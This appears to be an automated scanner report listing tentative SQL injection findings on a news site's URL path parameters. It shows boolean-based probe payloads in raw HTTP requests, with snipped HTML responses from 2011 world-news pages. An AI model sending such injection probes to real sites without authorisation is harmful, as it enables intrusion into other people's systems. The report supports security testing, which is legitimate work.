discussion. " name="description" property="og:description" /><meta content="Fri, 11 Jun 2010 17:41:17 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/37643077" /> <link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41164445'%20and%201%3d1--%20/ns/world_news-africa/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:11:01 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 60741
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <a href="http://www.msnbc.redacted/id/41239631/ns/world_news-africa/" title="View next story"> 6 dead in religion-torn central Nigerian region </a> </h6> </li> <li class="label"> <span class="nib hide"></span> <a href="#slice-3" title="Jump to related">
<div id="mainart" class="hmedia art grid-6x2 " about="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.grid-6x2.jpg"> <div class="img" rel="media:image enclosure" type="image/jpeg"> <img src="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.grid-6x2.jpg" width="474" height="316" alt="A Tunisian riot policeman searches through belongings of protesters after security forces stormed a protest camp in Tunis" class="photo" ...[SNIP]...
Request 2
GET /id/41164445'%20and%201%3d2--%20/ns/world_news-africa/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:11:01 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 60404
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <a href="http://www.msnbc.redacted/id/41324863/ns/world_news-africa/" title="View next story"> Soldiers shoot at university students in Nigeria </a> </h6> </li> <li class="label"> <span class="nib hide"></span> <a href="#slice-3" title="Jump to related">
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41164445/ns/world_news-africa'%20and%201%3d1--%20/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:59:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 60561
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:129150930 --> <title>Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41164445/ns/world_news-africa/" property="og:url" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" property="og:expires" /><meta content="unavailable_after: Wed, 27 Jul 2011 18:07:08 GMT" name="GOOGLEBOT" /><meta content="2011-01-29T18:04:26" property="og:updated" /><meta content="Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com" name="title" /><meta content="Tunis shopkeepers turn against protesters" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Lin Noueihed" property="og:author" /><meta content="Reuters" property="og:publisher" /><meta content="Provisional Government, Tunis, Tunisia, Government, Tunisia, Article, World News, Politics, Africa, d" name="keywords" property="og:tags" /><meta content="/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.standard.jpg" property="og:image" /><meta content="REUTERS" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Desperate to return to work after weeks of protests brought Tunis to a standstill, shopkeepers armed with sticks and knives guarded the entrance to the covered market on Saturday and pushed back a small gang of protesters." name="description" property="og:description" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" name="Search.Expires" /><meta content="Sat, 29 Jan 2011 18:04:26 GMT" name="Search.Upda ...[SNIP]...
Request 2
GET /id/41164445/ns/world_news-africa'%20and%201%3d2--%20/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:59:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 60651
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847512 --> <title>Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41164445/ns/world_news-africa/" property="og:url" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" property="og:expires" /><meta content="unavailable_after: Wed, 27 Jul 2011 18:07:08 GMT" name="GOOGLEBOT" /><meta content="2011-01-29T18:04:26" property="og:updated" /><meta content="Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com" name="title" /><meta content="Tunis shopkeepers turn against protesters" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Lin Noueihed" property="og:author" /><meta content="Reuters" property="og:publisher" /><meta content="Provisional Government, Tunis, Tunisia, Government, Tunisia, Article, World News, Politics, Africa, d" name="keywords" property="og:tags" /><meta content="/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.standard.jpg" property="og:image" /><meta content="REUTERS" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Desperate to return to work after weeks of protests brought Tunis to a standstill, shopkeepers armed with sticks and knives guarded the entrance to the covered market on Saturday and pushed back a small gang of protesters." name="description" property="og:description" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" name="Search.Expires" /><meta content="Sat, 29 Jan 2011 18:04:26 GMT" name="Search.Up ...[SNIP]...
1.113. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.msnbc.redacted
Path:
/id/41164445/ns/world_news-africa/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41164445/ns/world_news-africa/?1%20and%201%3d1--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:57:11 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 60561
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:485381290 --> <title>Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41164445/ns/world_news-africa/" property="og:url" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" property="og:expires" /><meta content="unavailable_after: Wed, 27 Jul 2011 18:07:08 GMT" name="GOOGLEBOT" /><meta content="2011-01-29T18:04:26" property="og:updated" /><meta content="Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com" name="title" /><meta content="Tunis shopkeepers turn against protesters" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Lin Noueihed" property="og:author" /><meta content="Reuters" property="og:publisher" /><meta content="Provisional Government, Tunis, Tunisia, Government, Tunisia, Article, World News, Politics, Africa, d" name="keywords" property="og:tags" /><meta content="/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.standard.jpg" property="og:image" /><meta content="REUTERS" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Desperate to return to work after weeks of protests brought Tunis to a standstill, shopkeepers armed with sticks and knives guarded the entrance to the covered market on Saturday and pushed back a small gang of protesters." name="description" property="og:description" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" name="Search.Expires" /><meta content="Sat, 29 Jan 2011 18:04:26 GMT" name="Search.Upda ...[SNIP]...
Request 2
GET /id/41164445/ns/world_news-africa/?1%20and%201%3d2--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:57:11 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 60688
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847510 --> <title>Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41164445/ns/world_news-africa/" property="og:url" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" property="og:expires" /><meta content="unavailable_after: Wed, 27 Jul 2011 18:07:08 GMT" name="GOOGLEBOT" /><meta content="2011-01-29T18:04:26" property="og:updated" /><meta content="Tunis shopkeepers turn against protesters - World news - Africa - msnbc.com" name="title" /><meta content="Tunis shopkeepers turn against protesters" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Lin Noueihed" property="og:author" /><meta content="Reuters" property="og:publisher" /><meta content="Provisional Government, Tunis, Tunisia, Government, Tunisia, Article, World News, Politics, Africa, d" name="keywords" property="og:tags" /><meta content="/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/reuters/2011-01-29t180426z_01_btre70r1lk000_rtroptp_3_tunisia.standard.jpg" property="og:image" /><meta content="REUTERS" name="Search.ImageSource" /><meta content="23294612872" property="fb:page_id" /><meta content="Desperate to return to work after weeks of protests brought Tunis to a standstill, shopkeepers armed with sticks and knives guarded the entrance to the covered market on Saturday and pushed back a small gang of protesters." name="description" property="og:description" /><meta content="Wed, 27 Jul 2011 18:07:08 GMT" name="Search.Expires" /><meta content="Sat, 29 Jan 2011 18:04:26 GMT" name="Search.Up ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 10493613'%20or%201%3d1--%20 and 10493613'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41323843/ns10493613'%20or%201%3d1--%20/world_news-mideastn_africa/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 02:03:05 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 189806
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... n police and protesters seeking to drive President Hosni Mubarak from power.","dateline":"CAIRO","components":{"survey":null,"slices":[{"lazyItems":[],"typeName":"TextSlice","RenderAuthority":"-1075847499","ItemIndex":0},{"videos":[{"launch":41328231,"plt":3,"plc":22422632,"settings":37785941,"settingsOverride":3032619,"typeName":"Video","RenderAuthority":"-1075847499","ItemIndex":0},{"launch":41328233,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847499","ItemIndex":0},{"launch":41328238,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847499","ItemIndex":0},{"launch":41325063,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847499","ItemIndex":0},{"launch":41328237,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847499","ItemIndex":0}],"typeName":"VideoSlice","RenderAuthority":"-1075847499","ItemIndex":0},{"bridge":[{"workbenchId":41294535,"headline":"Egyptians take to the streets","totalSlides":66,"firstSlide":{"headline":"","caption":"Anti-government protesters hold a sign in English reading \"Game Over Mubark\" and another in Arabic reading, \"You go out, because you damage Egyptian dignity,\" in Tahrir Square in Cairo, Egypt, Saturday, Jan. 29. (Ben Curtis / AP)","src":"http://msnbcmedia4.redacted/j/MSNBC/Components/Slideshows/_production/ss-110127-egypt-unrest/ss-110129-egypt-24.grid-8x2.jpg","w":640,"h":427,"isExplicit":false,"templateName":"RightNarrow","large":{"w":806,"h":537,"aims":"grid-10x2","templateName":"Below"},"tease":null,"typeName":"SlideshowSlide","RenderAuthority":"-1075847499","ItemIndex":0},"lastSlide":{"headline":"","caption":"Tear gas smoke fired by Egyptian police is seen as demonstrators gather in central Cairo on Jan. 25. (Mohammed Abed / AFP - Getty Images)","src":"http://msnbcmedia2.redacted/j/MSNBC/Components/Slideshows/_production/ss-110127-egypt-unrest/ss-110127-egypt-unrest-15.grid-8x2.jpg","w":640,"h":427,"isExplicit":false,"templateName":"RightNarrow","large":{"w":806,"h":537,"aims":"grid-10x2" ...[SNIP]...
Request 2
GET /id/41323843/ns10493613'%20or%201%3d2--%20/world_news-mideastn_africa/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 02:03:05 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 189340
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... n police and protesters seeking to drive President Hosni Mubarak from power.","dateline":"CAIRO","components":{"survey":null,"slices":[{"lazyItems":[],"typeName":"TextSlice","RenderAuthority":"-1075847510","ItemIndex":0},{"videos":[{"launch":41328231,"plt":3,"plc":22422632,"settings":37785941,"settingsOverride":3032619,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41328233,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41328238,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41325063,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0},{"launch":41328237,"plt":1,"plc":0,"settings":37785941,"settingsOverride":0,"typeName":"Video","RenderAuthority":"-1075847510","ItemIndex":0}],"typeName":"VideoSlice","RenderAuthority":"-1075847510","ItemIndex":0},{"bridge":[{"workbenchId":41294535,"headline":"Egyptians take to the streets","totalSlides":66,"firstSlide":{"headline":"","caption":"Anti-government protesters hold a sign in English reading \"Game Over Mubark\" and another in Arabic reading, \"You go out, because you damage Egyptian dignity,\" in Tahrir Square in Cairo, Egypt, Saturday, Jan. 29. (Ben Curtis / AP)","src":"http://msnbcmedia4.redacted/j/MSNBC/Components/Slideshows/_production/ss-110127-egypt-unrest/ss-110129-egypt-24.grid-8x2.jpg","w":640,"h":427,"isExplicit":false,"templateName":"RightNarrow","large":{"w":806,"h":537,"aims":"grid-10x2","templateName":"Below"},"tease":null,"typeName":"SlideshowSlide","RenderAuthority":"-1075847510","ItemIndex":0},"lastSlide":{"headline":"","caption":"Tear gas smoke fired by Egyptian police is seen as demonstrators gather in central Cairo on Jan. 25. (Mohammed Abed / AFP - Getty Images)","src":"http://msnbcmedia2.redacted/j/MSNBC/Components/Slideshows/_production/ss-110127-egypt-unrest/ss-110127-egypt-unrest-15.grid-8x2.jpg","w":640,"h":427,"isExplicit":false,"templateName":"RightNarrow","large":{"w":806,"h":537,"aims":"grid-10x2" ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 25334761'%20or%201%3d1--%20 and 25334761'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41323843/ns/world_news-mideastn_africa25334761'%20or%201%3d1--%20/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 02:04:39 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 189208
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:129150931 --> <title>Egyptians defiant as street battles persist - World news - Mideast/N. Africa - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41323843/ns/world_news-mideast/n_africa/" property="og:url" /><meta content="2011-01-30T01:45:57" property="og:updated" /><meta content="Egyptians defiant as street battles persist - World news - Mideast/N. Africa - msnbc.com" name="title" /><meta content="Egyptians defiant as street battles persist" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="NBC, msnbc.com and news services" property="og:publisher" /><meta content="Hosni Mubarak, Egypt, Government, Egypt, Article, World News, Politics, science, Africa, d" name="keywords" property="og:tags" /><meta content="/MSNBC/Components/Video/110129/nn_engel_egypt_110129.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/MSNBC/Components/Video/110129/nn_engel_egypt_110129.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="Looted stores, torched cars and the stench of blazing tires filled the streets of Cairo early on Sunday as clashes persisted between police and protesters seeking to drive President Hosni Mubarak from power." name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 01:45:57 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41323843/ns/world_news-mideast/n_africa/" /> <link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
GET /id/41323843/ns/world_news-mideastn_africa25334761'%20or%201%3d2--%20/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 02:04:40 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 189393
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847506 --> <title>Egyptians defiant as street battles persist - World news - Mideast/N. Africa - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41323843/ns/world_news-mideast/n_africa/" property="og:url" /><meta content="2011-01-30T01:45:57" property="og:updated" /><meta content="Egyptians defiant as street battles persist - World news - Mideast/N. Africa - msnbc.com" name="title" /><meta content="Egyptians defiant as street battles persist" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="NBC, msnbc.com and news services" property="og:publisher" /><meta content="Hosni Mubarak, Egypt, Government, Egypt, Article, World News, Politics, science, Africa, d" name="keywords" property="og:tags" /><meta content="/MSNBC/Components/Video/110129/nn_engel_egypt_110129.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/MSNBC/Components/Video/110129/nn_engel_egypt_110129.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="Looted stores, torched cars and the stench of blazing tires filled the streets of Cairo early on Sunday as clashes persisted between police and protesters seeking to drive President Hosni Mubarak from power." name="description" property="og:description" /><meta content="Sun, 30 Jan 2011 01:45:57 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/41323843/ns/world_news-mideast/n_africa/" /> <link href="http://assets1a.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/41324344%20and%201%3d1--%20/ns/world_news-south_and_central_asia/ HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:55:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 72902
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847510 --> <title>U.S. demands release of diplomat who killed 2 - World news - South and Central Asia - Pakistan - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/" property="og:url" /><meta content="2011-01-29T12:42:15" property="og:updated" /><meta content="U.S. demands release of diplomat who killed 2 - World news - South and Central Asia - Pakistan - msnbc.com" name="title" /><meta content="U.S. demands release of diplomat who killed 2" property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="The Associated Press" property="og:publisher" /><meta content="Pakistan, World News, Pakistan, US, Asia, Embassies, Violent crime, Diplomacy, Crime, General news, International relations, Government and politics, Article, u, AP" name="keywords" property="og:tags" /><meta content="/MSNBC/Components/Video/110128/x_lon_pakshoot_110128.jpg" name="Search.Image" /><meta content="http://msnbcmedia1.redacted/j/MSNBC/Components/Video/110128/x_lon_pakshoot_110128.standard.jpg" 